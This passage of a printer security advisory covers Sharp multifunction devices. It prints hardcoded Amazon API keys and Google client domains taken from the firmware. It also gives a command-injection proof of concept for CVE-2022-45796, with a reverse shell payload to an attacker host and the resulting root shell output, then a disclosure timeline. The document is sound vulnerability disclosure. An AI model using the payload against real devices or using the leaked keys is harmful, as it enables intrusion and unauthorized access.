possible to use wireshark to display the password. ## Details - Hardcoded Google API Keys The printers contain private API Keys in the `main` program. It is possible to retrieve specific googlecontent.com domain names in the main program: [please use the HTML version at https://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html] Reverse Engineering of the `sub_2146D54()` function defined in the main program will reveal some hardcoded keys: [please use the HTML version at https://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html] [please use the HTML version at https://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html] The domains listed in the binary are: - - 265490466885-m5cjvglv9q8aak493cgepe7juvafgh8c.apps.googleusercontent.com - - 347970444986-0pij6u2tfhb240edjmls3h1u8qm2v2b3.apps.googleusercontent.com - - 410988772526-6ujegl6jvquh9kstiegva8fk5j2ogag9.apps.googleusercontent.com - - 292646726735-033ggn9hmlrs8bntrj0fbstob9m8qt26.apps.googleusercontent.com These domains do not appear to be used anymore and are free for any user. An attacker can use them to receive traffic from the printers. ## Details - Hardcoded Amazon API Keys The printers contain private API Keys in the `main` program. It is possible to retrieve a specific amazonaws.com address in the `main` program: - - https://7db3z5d116.execute-api.ap-northeast-1.amazonaws.com/prod/MFPDataAlalytics When Cross-referencing this address, it appears that some private API keys are hardcoded in the program, as shown below: - - Postman private key: `44688039-5104-39be-f974-c1f5ef621a5f` - - API-KEY: `PBYXSIK6av8fBt8Qe1EQUaF9ZaKvTDutaXS9YwWA` Reverse Engineering of the sub_20D542C function defined in the `main` program: [please use the HTML version at https://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html] [please use the HTML version at https://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html] We can see that curl is invoked with the `-k` option (aka `--insecure`) so any invalid SSL certificate will be accepted: The pseudo-code of `sub_20D542C()` is: int __fastcall sub_20D542C(const char *a1, const char *a2) { ... if ( sub_6A0DA0(606420, 0) ) { sub_6A174C((char *)&loc_940DC + 2, v4, 255); sub_6A174C((char *)&loc_940DC + 3, v6, 80); sub_6A174C(606432, v7, 80); if ( !*v6 ) j_strncpy_0(v6, "user", 0x50u); v11 = sub_6A107C(&loc_940E8, 3080); j_snprintf( v9, 0x800u, "/usr/bin/curl -k -o %s -U %s:%s -x %s:%d -X POST -d @\"%s\" -H \"x-api-key: PBYXSIK6av8fBt8Qe1EQUaF9ZaKvTDut" "aXS9YwWA\" -H \"Cache-Control: no-cache\" -H \"Postman-Token: 44688039-5104-39be-f974-c1f5ef621a5f\" -L \"%s\"", a2, v6, v7, v4, v11, a1, "https://7db3z5d116.execute-api.ap-northeast-1.amazonaws.com/prod/MFPDataAlalytics"); sub_20D7E20( "[analy][curl] /usr/bin/curl -k -o %s -U %s:xxx -x %s:%d -X POST -d @\"%s\" -H \"x-api-key: PBYXSIK6av8fBt8Q" "e1EQUaF9ZaKvTDutaXS9YwWA\" -H \"Cache-Control: no-cache\" -H \"Postman-Token: 44688039-5104-39be-f974-c1f5ef" "621a5f\" -L \"%s\"\n", a2, v6, v4, v11, a1, "https://7db3z5d116.execute-api.ap-northeast-1.amazonaws.com/prod/MFPDataAlalytics"); } else { j_snprintf( v9, 0x800u, "/usr/bin/curl -k -o %s -X POST -d @\"%s\" -H \"x-api-key: PBYXSIK6av8fBt8Qe1EQUaF9ZaKvTDutaXS9YwWA\" -H \"Ca" "che-Control: no-cache\" -H \"Postman-Token: 44688039-5104-39be-f974-c1f5ef621a5f\" -L \"%s\"", a2, a1, "https://7db3z5d116.execute-api.ap-northeast-1.amazonaws.com/prod/MFPDataAlalytics"); sub_20D7E20( "[analy][curl] /usr/bin/curl -k -o %s -X POST -d @\"%s\" -H \"x-api-key: PBYXSIK6av8fBt8Qe1EQUaF9ZaKvTDutaXS9" "YwWA\" -H \"Cache-Control: no-cache\" -H \"Postman-Token: 44688039-5104-39be-f974-c1f5ef621a5f\" -L \"%s\"\n", a2, a1, "https://7db3z5d116.execute-api.ap-northeast-1.amazonaws.com/prod/MFPDataAlalytics"); } v12 = j_mfp_system((int)v9); ## Details - CVE-2022-45796 - RCE Since the PoC for CVE-2022-45796 was not public, an authenticated admin user can go to http://ip/nw_interface.html and use the IPv6 IP field to exploit a command injection: [please use the HTML version at https://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html] [please use the HTML version at https://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html] Using Burp, an attacker can intercept the resulting request and inject a command inside the vulnerable `ggt_textbox(16)` field, for example, `ggt_textbox%2816%29=%7Cbash+-i+%3E%26+%2Fdev%2Ftcp%2Fattacker_ip%2F443+0%3E%261` corresponding to the payload `|bash -i /dev/tcp/attacker_ip/443 0>&1`. The attacker will receive a root shell from the printers and will get a full admin access, allowing to backdoor the printer for persistence: kali% nc -l -v -p 443 listening on [any] 443 ... 10.0.0.1: inverse host lookup failed: Unknown host connect to [10.0.0.10] from (UNKNOWN) [10.0.0.1] 58196 bash: cannot set terminal process group (619): Inappropriate ioctl for device bash: no job control in this shell bash-4.3# id uid=0(root) gid=0(root) groups=0(root) bash-4.3# uname -ap Linux SC58C36B 4.1.46-rt52 #2 SMP PREEMPT RT Fri Apr 26 12:29:16 JST 2019 aarch64 GNU/Linux bash-4.3# ps -auxww | grep ping root 5022 0.0 0.0 1916 368 ? S 09:34 0:00 grep ping root 28966 0.0 0.0 2876 1940 ? S 09:33 0:00 sh -c ping6 -c 1 -W 2 |bash -i >& /dev/tcp/10.0.0.10/443 0>&1 bash-4.3# init-+-aarch64-fsl-lin |-access_audit_mg |-bcr_iface |-blackscreen_mon |-check_hash_daem |-cmd_proc |-cpu_state |-dbus-daemon |-dout_daemon---14*[{dout_daemon}] |-dummy_init |-getty |-intsrt |-linter |-mgrcpuif_r1b---2*[{mgrcpuif_r1b}] |-mgrcpuif_r1c---2*[{mgrcpuif_r1c}] |-nfcproc---7*[{nfcproc}] |-ocrsrv---21*[{ocrsrv}] |-oom_watch |-poff_reboot |-pulseaudio---{null-sink} |-rc---S998linuxApp-+-IFS---20*[{IFS}] | |-main-+-preview---48*[{preview}] | | |-sxlinklocald | | `-514*[{main}] | |-netp---netp---sh---bash---pstree | |-pdl---43*[{pdl}] | |-reus_lcd_mgr---{reus_lcd_mgr} | |-rtc_manager---{rtc_manager} | |-2*[seriallink---6*[{seriallink}]] | |-sound_play-+-14*[{sound_play}] | | `-{threaded-ml} | |-startx---xinit-+-X | | `-sh-+-NX---7*[{NX}] | | |-ui_mainview---12*[{ui_mainview}] | | `-ui_subview---7*[{ui_subview}] | |-usbch_mgr | |-vmstat | |-watch_proc | `-wlctlproc---6*[{wlctlproc}] |-2*[rotate] |-rsyslogd-+-{in:imklog} | |-{in:immark} | |-{in:imuxsock} | `-{rs:main Q:Reg} |-system_reset---6*[{system_reset}] `-udevd---2*[udevd] bash-4.3# ## Vendor Response JPCERT provided a security bulletin: https://jvn.jp/en/vu/JVNVU93051062/index.html. Sharp provided a security bulletin: https://global.sharp/products/copier/info/info_security_2024-05.html. Toshiba provided a security bulletin: https://www.toshibatec.com/information/20240531_02.html. ## Report Timeline * May 2023: Security assessment performed on Sharp Multi-function printers. * June 1, 2023: A complete report was sent to JPCERT (security contact for Sharp). * June 6, 2023: JPCERT aknowledged the reception of the security assessment and asked more information about the security contact. * June 7, 2023: Information about the security contact provided to JPCERT. * June 7, 2023: JPCERT confirmed the reception of the security contact. * Jul 17, 2023: Questions sent to JPCERT asking for any feedback from Sharp. * Jul 18, 2023: JPCERT confirmed that they had a meeting with Sharp a week ago. Sharp finished the investigation and was preparing a document listing all the issues. * Jul 25, 2023: JPCERT provided the Excel file with Sharp's comments. * Jul 26, 2023: I confirmed the reception of the documents * Jul 28, 2023: Comments sent to JPCERT in the Excel file to ask to re-evaluate some issues. * Aug 1, 2023: Received responses from JPCERT regarding some of the issues. * Aug 1, 2023: Additional information provided to JPCERT regarding a potential disclosure of vulnerabilities if the issues are not patched. I suggested a tripartite meeting with Sharp and JPCERT to review the issues. * Aug 2, 2023: JPCERT suggested solutions to get security patches in a timely manner by prioritizing issues. * Aug 3, 2023: Agreed with JPCERT to prioritize vulnerabilities based on severity, then patch critical vulnerabilities as soon as possible while delaying hard-to-fix vulnerabilities. * Aug 4, 2023: JPCERT confirmed that they are working with Sharp to get the issues fixed. * Aug 16, 2023: JPCERT confirmed that they asked Sharp to reconsider some of the issues with two buckets (short-term fixes and long-term countermeasures) and that Sharp was working on the issues. * Sep 13, 2023: I answered that it is an acceptable practice, since short-term fixes and long-term countermeasures are currently being implemented by other printer vendors. * Sep 14, 2023: JPCERT confirmed that they are working with Sharp to get security patches. * Oct 10, 2023: I confirmed the reception of the updates. * Nov 16, 2023: JPCERT provided a new Excel file with the issues and the countermeasures provided by Sharp. * Nov 21, 2023: Excel file was reviewed and Sharp suggested to patch vulnerable code and remove vulnerable features. * Jan 29, 2024: Asking about the status of the vulnerabilities (CVE, availability of security patches). * Jan 30, 2024: JPCERT confirmed that a JVN advisory will be published with corresponding CVEs. Security patches will be provided by May 2024. * Jan 30, 2024: I suggested to test patched firmware images to confirm that vulnerabilities were correctly patched. * Jan 31, 2024: JPCERT passed the message to Sharp regarding additional tests of patched firmware images. * Feb 16, 2024: JPCERT sent the updated Excel file containing the vulnerabilities. * Feb 16, 2024: Confirmation of the reception of the Excel file. * Feb 20, 2024: Updated Excel file sent to JPCERT with my comments. * Mar 1, 2024: JPCERT sent comments regarding my feedbacks. * Mar 4, 2024: I confirmed the reception of the feedbacks. * May 8, 2024: Email asking JPCERT when the security advisories and security patches will be published. * May 16, 2024: JPCERT sent a list of affected products/versions and confirmed that they are working on a draft. * May 20, 2024: I suggested to include unsupported models since, based on my testing, some unsupported models were vulnerable. * May 21, 2024: JPCERT reported sending this suggestion to Sharp. * May 28, 2024: JPCERT provided the JVN English edition draft advisory, the final list of affected products and Toshiba Tech MFPs information. * May 28, 2024: I asked JPCERT to provide me with the list of CVEs for the list of vulnerabilities I reported. * May 29, 2024: JPCERT provided a list of vulnerabilities along with CVEs and clarifications regarding some of the findings. * May 30, 2024: Confirmation sent to JPCERT that the list was received. * May 31, 2024: JPCERT published a security advisory: https://jvn.jp/en/vu/JVNVU93051062/index.html. * May 31, 2024: Sharp published a security advisory: https://global.sharp/products/copier/info/info_security_2024-05.html. * May 31, 2024: Toshiba published a security advisory: https://www.toshibatec.com/information/20240531_02.html. * June 27, 2024: A security advisory is published. ## Credits These vulnerabilities were found by Pierre Barre aka Pierre Kim (@PierreKimSec). ## References https://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html https://pierrekim.github.io/advisories/2024-sharp-mfp.txt https://jvn.jp/en/vu/JVNVU93051062/index.html https://global.sharp/products/copier/info/info_security_2024-05.html https://www.toshibatec.com/information/20240531_02.html ## Disclaimer This advisory is licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 License: http://creativecommons.org/licenses/by-nc-sa/3.0/ -----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEEoSgI9MSrzxDXWrmCxD4O2n2TLbwFAmZ9pYoACgkQxD4O2n2T Lbx2Iw//TIRFzVnpQwVpk/SHRg/f7MHlQmTeSmXTJiataDytUiio8OtfWpkAHLy6 KTPW0XHxkGBrndZbeay/hmyDHKH5yrhrzF/OqXHetZVDKx7bzFBAkFTeuPQdgyv4 xQmfmv3DbvSrfCXMnNTMvh4XE1JT4l4Ng4fbOxx3x5s7cgBKpsw5QO045nsrWmIN 9L9mqY3h6o0lmcPt04HO/Th1sREbNeeSzg6S5jwdM77ZZQkXg6NQ3Fob+RJkd2oK tJJF3t48j1aIVRoW/RAaxL0bkzbxnWC0OSKYmGSNKGlXsmpQ6BNf5baLl4ursSO/ iIeVYhIgLNIL0NwbInbDWIBsDjEVpAh74BDBrHAafzLryPYZUL+jBw0CkJxUkyxg HbR/AbpHe+aXR6semM1E3pWmu2Z3Z1qGUIef+NULYUHPIpSNFqQ9sfQmzStRvz1z unFOhjuOMlMFoPcDa3eL/iJOl64fNE/tu4Qi+ytt8gyy6sEFj0ZOXLJMNBg30E+s aRdE+eAiVVp+/Pj+O4+YGYtUzwNyW2RgdLtAXihBVzFlprSA/26scNog39zgxPQ+ M7qjcVCxFvoL6kKvf/Y0aDvXT27Z+yV5G5l3v29XbB77az+i5TzA9d9LSfcZv6+r H5tsJlPs6r65uRi3JGNDBTnkW85UENOwpnwLiCrYJwhrExUjky0= =cwDH -----END PGP SIGNATURE----- -- Pierre Kim pierre.kim.sec@gmail.com @PierreKimSec https://pierrekim.github.io/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top